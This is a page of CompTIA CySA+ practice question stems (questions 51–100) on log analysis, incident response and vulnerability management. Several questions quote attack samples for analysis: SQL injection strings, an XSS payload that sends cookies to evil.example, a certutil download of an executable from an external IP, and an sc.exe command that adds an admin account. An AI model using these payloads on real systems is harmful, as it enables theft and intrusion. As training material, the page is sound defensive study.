CompTIA CySA+ (CS0-003) practice questions

231 free questions with answers and explanations.

Practice test
  1. 51.A security analyst is investigating a suspected data exfiltration event. The analyst reviews firewall logs and identifies suspicious outbound connections to an unknown IP address (185.220.101.11) on port 443 from an internal server. The analyst needs to include relevant log snippets in the incident report. Which of the following log entries would be MOST indicative of data exfiltration?Reporting and Communication
  2. 52.A security analyst is reviewing web server access logs and notices the following entries originating from a single IP address (192.168.1.10) targeting a login page: ``` 192.168.1.10 - - [10/Nov/2023:10:30:01 +0000] "GET /login.php?username=admin' OR 1=1--&password=password HTTP/1.1" 200 4567 192.168.1.10 - - [10/Nov/2023:10:30:02 +0000] "GET /login.php?username=test'%20OR%20'a'='a&password=test HTTP/1.1" 200 4567 ``` What type of attack is indicated by these log entries?Security Operations
  3. 53.During threat hunting, an analyst reviews proxy logs and finds a workstation sending an outbound HTTPS request to the same external IP address every 60 seconds, each request transferring nearly identical byte counts, 24 hours a day, even outside business hours. Which indicator of malicious activity does this pattern most strongly suggest?Security Operations
  4. 54.A SOC analyst is configuring log forwarding and needs to ensure that only the most critical events (system unusable, requires immediate action) are forwarded to an on-call pager system. Per standard syslog severity levels, which severity value should the filter match?Security Operations
  5. 55.A code review reveals that a web application takes user-submitted comment text and inserts it directly into the HTML response without modification. A tester submits a comment containing `<script>document.location='http://evil.example/steal?c='+document.cookie</script>`, and the script executes in other users' browsers whenever they view the comment. Which secure coding practice would most directly remediate this vulnerability?Vulnerability Management
  6. 56.A security operations center (SOC) analyst is investigating an alert from the SIEM indicating a large volume of failed login attempts against a critical web application. The alert shows attempts to log in with common usernames like 'admin', 'user', and 'test', combined with dictionary-based passwords, all originating from a single external IP address over a short period. Which type of attack is being observed?Security Operations
  7. 57.An analyst captures traffic and observes the following pattern from an internal workstation to an external host over a 45-minute window: `10.1.5.22 -> 198.51.100.9 ICMP echo request, seq=1..900, len=1400 bytes, interval ~3s` `198.51.100.9 -> 10.1.5.22 ICMP echo reply, payload contains variable non-standard ASCII data` No legitimate network monitoring tool is configured to ping this host. Which of the following BEST explains this traffic pattern?Security Operations
  8. 58.A security team is implementing a vulnerability management program for a new cloud environment. They want to ensure that all deployed cloud resources (e.g., virtual machines, storage buckets, network configurations) continuously adhere to security best practices and compliance policies, and that misconfigurations are detected promptly. Which solution best addresses this requirement?Vulnerability Management
  9. 59.A security analyst is conducting a post-incident review for a ransomware attack that encrypted several departmental file shares. The 'lessons learned' report needs to include a section on 'Analysis of Contributing Factors' to understand why the attack was successful. Which of the following categories of information would be MOST critical to include in this section?Reporting and Communication
  10. 60.A security analyst is reviewing a firewall log from a critical server and observes the following entries: ``` TIME SRC_IP DST_IP DST_PORT PROTOCOL ACTION 2023-11-15 10:00:01 192.168.1.10 10.0.0.50 80 TCP ALLOW 2023-11-15 10:00:02 192.168.1.10 10.0.0.50 443 TCP ALLOW 2023-11-15 10:00:03 192.168.1.10 10.0.0.50 22 TCP DENY 2023-11-15 10:00:04 192.168.1.10 10.0.0.50 3389 TCP DENY 2023-11-15 10:00:05 192.168.1.10 10.0.0.50 53 UDP ALLOW 2023-11-15 10:00:06 192.168.1.10 10.0.0.50 53 TCP DENY 2023-11-15 10:00:07 192.168.1.10 10.0.0.50 135 TCP DENY 2023-11-15 10:00:08 192.168.1.10 10.0.0.50 137 UDP DENY 2023-11-15 10:00:09 192.168.1.10 10.0.0.50 138 UDP DENY 2023-11-15 10:00:10 192.168.1.10 10.0.0.50 139 TCP DENY 2023-11-15 10:00:11 192.168.1.10 10.0.0.50 445 TCP DENY ``` Which of the following attack types is the source IP `192.168.1.10` MOST likely attempting to conduct against `10.0.0.50`?Incident Response and Management
  11. 61.A SOC analyst is implementing a new SIEM correlation rule to detect suspicious account activity. The rule is designed to flag an alert if a single user account logs in from geographically distant locations within an impossibly short timeframe, for example, logging into a system in New York and then 10 minutes later logging into a system in London. What type of detection logic is the analyst employing?Security Operations
  12. 62.An EDR platform generates the following alert on a finance workstation with no active IT ticket: `cmd.exe /c certutil.exe -urlcache -split -f http://185.220.101.7/update.exe C:\Users\Public\update.exe` The parent process is explorer.exe, and the user reports they only opened an email attachment. Which of the following BEST describes this activity?Security Operations
  13. 63.A network administrator wants to isolate broadcast traffic between the finance and HR departments so that a compromised host or broadcast storm in one department cannot directly affect devices in the other, without installing additional physical switches. Which technology should be implemented?Security Operations
  14. 64.A credentialed vulnerability scan of a Linux server returns zero findings. During a manual review, an analyst discovers the installed OpenSSL package is affected by a critical, publicly known CVE. Investigation shows the scanning service account's password had expired the night before the scan, causing authentication to silently fail while the scanner still returned a status of 'completed' after falling back to limited host discovery. How should this scan result be classified?Vulnerability Management
  15. 65.A SOC analyst reviewing endpoint logs finds the following command executed by a standard user's process: `C:\Windows\System32\sc.exe config wuauserv binpath= "cmd.exe /c net user backupadmin P@ssw0rd123! /add" start= auto` The attacker then restarts the Windows Update service to trigger the command with SYSTEM-level rights. Which MITRE ATT&CK tactic does this behavior represent?Vulnerability Management
  16. 66.A security analyst is performing a penetration test against a web application. During the reconnaissance phase, the analyst discovers that the application uses a reverse proxy. To bypass IP-based access restrictions and potentially spoof their origin, the analyst modifies HTTP headers. Which HTTP header is commonly abused for this purpose?Security Operations
  17. 67.A threat intelligence team explains that a file hash matching a known malware sample is a static artifact left behind after compromise, whereas observing a sequence of unusual PowerShell execution followed by registry modification and scheduled task creation represents an evolving behavioral pattern that can be detected while the attack is still unfolding. Which term describes this second, behavior-based concept?Security Operations
  18. 68.A security analyst is reviewing a vulnerability scan report that lists several critical findings. One finding indicates that an internal web server is running an outdated version of Apache HTTP Server (2.2.x) which is known to have multiple unpatched vulnerabilities. The server cannot be immediately updated due to application compatibility issues. To mitigate the risk, the team implements a Web Application Firewall (WAF) in front of the server, configured with rules to detect and block exploit attempts targeting the known Apache vulnerabilities. What type of control does the WAF represent in this scenario?Vulnerability Management
  19. 69.A security analyst is investigating a suspected malware infection on a Windows workstation. The EDR solution reports a process named `svch0st.exe` (note the '0' instead of 'o') running from `C:\Users\Public\Documents\` and making outbound connections to a known malicious IP address. The legitimate `svchost.exe` is typically located in `C:\Windows\System32\`. Which common defense evasion technique is this malware most likely employing?Security Operations
  20. 70.A security analyst is reviewing network traffic on a segment hosting critical industrial control systems (ICS). The analyst notices a significant amount of Modbus/TCP traffic originating from an unauthorized IT workstation (192.168.10.50) attempting to communicate with a Programmable Logic Controller (PLC) (172.16.1.10) on port 502. The IT workstation should not be initiating direct communication with the PLC. What is the most critical security concern presented by this activity in an OT/ICS environment?Security Operations
  21. 71.A security analyst is reviewing a vulnerability report from a recent penetration test. The report identifies several critical findings on an externally facing web server. The analyst needs to present these findings to the IT operations team for remediation. Which of the following details should the analyst prioritize in the report to ensure the IT operations team can efficiently address the vulnerabilities?Reporting and Communication
  22. 72.An analyst is scoring a vulnerability in a hypervisor management API using CVSS v3.1. An authenticated low-privileged user (PR:L) can send a crafted request over the network (AV:N, AC:L, UI:N) that escapes the guest VM and gains complete control of the underlying host, impacting resources far beyond the vulnerable API's own security authority. Which Scope value should be selected, and how does it change the resulting base score compared to leaving Scope unchanged?Vulnerability Management
  23. 73.A security analyst is conducting a post-incident review for a successful ransomware attack. The 'lessons learned' report needs to highlight areas for improving the organization's resilience. Which of the following would be the MOST critical metric to analyze and potentially improve for future incident recovery?Reporting and Communication
  24. 74.A security analyst is investigating an incident where a critical application server was compromised. The attacker exploited a known vulnerability in an unpatched third-party library used by the application. The organization had a policy to apply patches within 30 days of release, but this specific library's patch was overlooked. What type of vulnerability management failure does this scenario represent?Vulnerability Management
  25. 75.An analyst examines a packet capture and notices the following ARP traffic on the internal LAN segment: 192.168.1.1 is-at AA:BB:CC:11:22:33 192.168.1.1 is-at DE:AD:BE:EF:00:01 192.168.1.1 is-at AA:BB:CC:11:22:33 192.168.1.1 is-at DE:AD:BE:EF:00:01 The legitimate gateway's known MAC address is AA:BB:CC:11:22:33. What is the most likely explanation and appropriate immediate response?Security Operations
  26. 76.A company is redesigning its network architecture around the principle of 'never trust, always verify,' requiring continuous authentication and authorization for every resource request regardless of the user's network location. Which architectural model is being implemented?Security Operations
  27. 77.A phishing campaign delivers a malicious Excel attachment. The vulnerability it exploits only triggers if the recipient opens the file and clicks 'Enable Content' to run the embedded macro. Which CVSS v3.1 base metric value best reflects this exploitation requirement?Vulnerability Management
  28. 78.A security analyst is reviewing the effectiveness of the organization's security controls based on recent vulnerability scan results. They note that the number of 'High' severity vulnerabilities has decreased by 20% over the last quarter, while the number of 'Medium' severity vulnerabilities has remained constant. Which of the following conclusions can be drawn from this trend regarding the organization's vulnerability management program?Reporting and Communication
  29. 79.A security analyst is building a threat hunting hypothesis focused on detecting advanced persistent threats (APTs). The analyst wants to gain deeper visibility into process creation, network connections, and file modifications on Windows endpoints, beyond what standard Windows Event Logs provide. Which tool would be most effective for this purpose?Security Operations
  30. 80.A security analyst is investigating a suspected intrusion. They find evidence that an attacker gained initial access through a phishing email and then used a known operating system vulnerability to elevate privileges. The attacker then used these elevated privileges to deploy a backdoor and establish a command-and-control channel. Which MITRE ATT&CK tactic does the deployment of the backdoor and establishment of the C2 channel primarily represent?Vulnerability Management
  31. 81.An organization is preparing its annual compliance report for HIPAA. A cybersecurity analyst is tasked with providing evidence of ongoing security monitoring and incident detection capabilities. Which of the following log snippets, if consistently collected and reviewed, would BEST demonstrate adherence to HIPAA's security rule regarding audit controls and incident detection?Reporting and Communication
  32. 82.A security analyst is assessing the network for potential vulnerabilities. They notice that a number of end-of-life (EOL) operating systems are still running on several servers within the internal network. These servers are used for various non-critical internal functions and have no direct internet exposure. What is the primary concern from a vulnerability management perspective regarding these EOL systems?Vulnerability Management
  33. 83.A security analyst is compiling a vulnerability report for the executive leadership team. The report identifies a critical vulnerability (CVSS v3.1 score: 9.8) in a public-facing web application. To effectively communicate the business impact and urgency, which of the following metrics or statements should the analyst prioritize including?Reporting and Communication
  34. 84.A security analyst is investigating an alert from an Endpoint Detection and Response (EDR) system indicating suspicious activity on a user's workstation. The alert details show a process named 'updater.exe' initiating an outbound connection to a known malicious IP address over a non-standard port (TCP 4444). Further investigation reveals that 'updater.exe' is not a legitimate system process and was launched from a temporary directory. Which of the following incident response phases should the analyst prioritize NEXT after confirming the malicious activity?Incident Response and Management
  35. 85.A SOC analyst is implementing a new SIEM correlation rule to detect suspicious account activities. The rule is designed to trigger an alert if a single user account successfully logs in from two geographically distant locations (e.g., New York and Tokyo) within a 5-minute window. The SIEM has access to authentication logs that include source IP addresses and geolocation data. Which type of indicator of compromise (IOC) is this correlation rule primarily designed to detect?Security Operations
  36. 86.A malware analyst detonates a suspicious executable in an isolated sandbox and observes the following behavior report: Process: invoice.exe -> spawns svchost.exe -> injects code into svchost.exe memory space -> svchost.exe opens outbound connection to 185.203.x.x:443 Which technique is the malware most likely using to evade detection?Security Operations
  37. 87.A cybersecurity analyst is preparing a vulnerability report for executive leadership. The report needs to clearly articulate the potential business impact of identified critical vulnerabilities. Which of the following metrics would be MOST effective in conveying this information to a non-technical audience?Reporting and Communication
  38. 88.An analyst reviews a CVSS v3.1 temporal vector string attached to a finding: `E:F/RL:O/RC:C`. What does the `RL:O` component indicate about the current remediation state of the vulnerability?Vulnerability Management
  39. 89.A security analyst is investigating a report of slow network performance and suspicious activity on a critical database server. A packet capture reveals an unusually high volume of TCP packets with the SYN flag set, all originating from a single internal IP address (192.168.1.20) and targeting the database server's open port 1433 (MS SQL Server). Many of these SYN packets are not followed by an ACK from the source, and the server is showing a high number of half-open connections. Which type of denial-of-service attack is most likely occurring?Security Operations
  40. 90.During an incident response, a security analyst discovers that a critical database server has been compromised. The attacker gained root access and modified several system binaries. The incident response plan dictates a full recovery. Which of the following is the MOST appropriate action during the eradication and recovery phases for this server?Incident Response and Management
  41. 91.A security analyst is reviewing a custom web application's access logs and identifies the following requests from a single source IP (192.168.1.100): ``` GET /search?query=test%27%20AND%20substring(version(),1,1)=%275%27-- HTTP/1.1 GET /search?query=test%27%20AND%20substring(version(),1,1)=%278%27-- HTTP/1.1 GET /search?query=test%27%20AND%20substring(version(),1,1)=%27M%27-- HTTP/1.1 ``` No direct error messages or data are returned in the HTTP responses, but the response time for the first request is 200ms, the second is 500ms, and the third is 200ms. What type of SQL Injection attack is most likely being attempted?Security Operations
  42. 92.A security analyst discovers a backdoor shell running on a Linux server, allowing unauthorized remote access. After containing the threat, the analyst needs to ensure the backdoor is completely removed. Which of the following eradication steps is CRITICAL to prevent re-infection?Incident Response and Management
  43. 93.A security analyst is investigating a potential compromise on a Linux server. They suspect a malicious process is attempting to hide its activity. The analyst runs the 'ps aux' command and sees the following output snippet: ``` USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 170900 9208 ? Ss Oct01 0:02 /sbin/init user1 12345 0.1 0.2 123456 12345 ? S Oct02 0:05 /usr/bin/python3 /tmp/.hidden/malware.py root 23456 0.0 0.1 10000 1000 ? R 10:30 0:00 [kworker/u8:0-events] ``` Based on this output, which of the following is the MOST suspicious indicator of compromise?Incident Response and Management
  44. 94.A security analyst is investigating a vulnerability in a custom web application. The application's source code contains a function that concatenates user input directly into an SQL query without any sanitization or parameterization. This vulnerability has a CVSS v3.1 vector string of `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`. What is the primary secure coding practice that, if implemented, would mitigate this specific vulnerability?Vulnerability Management
  45. 95.A malware analyst performs static analysis on a suspicious executable and calculates its Shannon entropy at 7.9 out of a maximum of 8.0, with no readable strings and no recognizable import table. Which of the following BEST explains this finding?Security Operations
  46. 96.A vulnerability management team has two findings to remediate this week: Vulnerability A has a CVSS score of 9.8 but exists only on an isolated internal lab server with no network access. Vulnerability B has a CVSS score of 7.5, is on an internet-facing web server, and has a publicly available exploit actively being used in the wild. Which vulnerability should be prioritized for immediate remediation?Vulnerability Management
  47. 97.During a post-incident review, an analyst is compiling a 'lessons learned' report. The team successfully contained a sophisticated phishing attack, but the initial detection took longer than expected due to alert fatigue. Which section of the lessons learned report should detail this specific challenge and propose a solution?Reporting and Communication
  48. 98.A security team is preparing for a compliance audit against PCI DSS. They need to demonstrate that all systems processing cardholder data are regularly scanned for vulnerabilities and that critical findings are remediated promptly. Which of the following KPIs would be MOST suitable to include in their compliance report to satisfy this requirement?Reporting and Communication
  49. 99.A security analyst is reviewing network flow logs and observes an unusual volume of outbound traffic from a database server to multiple external IP addresses over port 53 (DNS). The database server should not be initiating external DNS queries, especially not at this volume. An excerpt from the logs is below: ``` TIME SRC_IP DST_IP SPORT DPORT PROTO BYTES 16:34:01 192.168.1.10 1.2.3.4 49876 53 UDP 128 16:34:01 192.168.1.10 5.6.7.8 49877 53 UDP 128 16:34:02 192.168.1.10 9.10.11.12 49878 53 UDP 128 16:34:02 192.168.1.10 13.14.15.16 49879 53 UDP 128 ``` Which type of attack is MOST likely indicated by this activity?Incident Response and Management
  50. 100.A web application log shows the following request submitted to a login form: `POST /login.php HTTP/1.1` `username=admin' OR '1'='1&password=anything` Which secure coding practice would have most effectively prevented this attack from succeeding?Vulnerability Management